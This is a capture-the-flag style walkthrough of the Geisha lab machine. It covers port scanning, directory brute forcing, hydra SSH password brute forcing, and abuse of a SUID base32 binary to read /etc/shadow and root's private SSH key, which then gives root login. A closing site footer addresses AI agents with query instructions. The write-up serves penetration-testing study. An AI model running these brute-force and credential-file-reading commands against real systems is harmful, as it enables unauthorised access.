# Geisha ## Nmap ``` sudo nmap 192.168.152.82 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 7080/tcp open ssl/empowerid LiteSpeed 7125/tcp open http nginx 1.17.10 8088/tcp open http LiteSpeed httpd 9198/tcp filtered unknown Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` This one is a little bit tricky as we have multiple web servers which all appear to land us on the same page: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eb2ebdece7212ce58bef0c5f1102e5f90521cb09%2Fimage.png?alt=media) I put all the web server ports and addresses into a text file called list.txt and used `dirsearch.py` to run through each target. ``` python3 dirsearch.py -l list.txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 60 --full-url ``` After some time we get an interesting hit on port 7125. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b26076e2728900ba46b3c20adf3c5f0d49748b13%2Fimage.png?alt=media) I browsed to the URL and downloaded passwd. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fbbb5eb59429616f7a4a2735919fac6dfee043b%2Fimage.png?alt=media) From this we do know the user geisha exists on the system and can start to brute force the user. Running hydra against `SSH` we soon get a valid hit. ``` hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.152.82 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-06fc53db9f403cf6f63aac02c64fd4ca5a6af98e%2Fimage.png?alt=media) We now have `SSH` access as the user. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cff0ed564838d161c4e470e8339c95703d78c529%2Fimage.png?alt=media) As per usual I transferred over `linpeas` to the machine and after running we have identified the SUID bit being set on the base32 binary. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8acac8e3391486e16cf2bae034c5436781db1a33%2Fimage.png?alt=media) According to [GTFOBins ](https://gtfobins.github.io/gtfobins/base32/)we can take advantage of this to perform privileged file reads. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79c3439b70c75a7548a319c9a8ce327d64ca6969%2Fimage.png?alt=media) Initially I used this to read the /etc/shadow file. However, I was unable to crack the password with rockyou.txt. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-af574567f0f78f9bac2882ec78f41750add4ab94%2Fimage.png?alt=media) Now we could use this to read the proof.txt flag but, we are not really done until we gain a root shell. I decided to have a stab at the root account having a id\_rsa key. ``` /usr/bin/base32 /root/.ssh/id_rsa | base32 --decode ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a08362133211a3ecb190bb4e88a4bb5e6a519d63%2Fimage.png?alt=media) I then transferred the key over to my attacking machine and used `chmod` to set appropriate permissions. ``` chmod 600 id_rsa ``` Then used the id\_rsa key to connect in as root on SSH. ``` ssh -i id_rsa root@192.168.152.82 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a8cf541d870a049772cbfd937e6eec7a0d63ca28%2Fimage.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/geisha.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.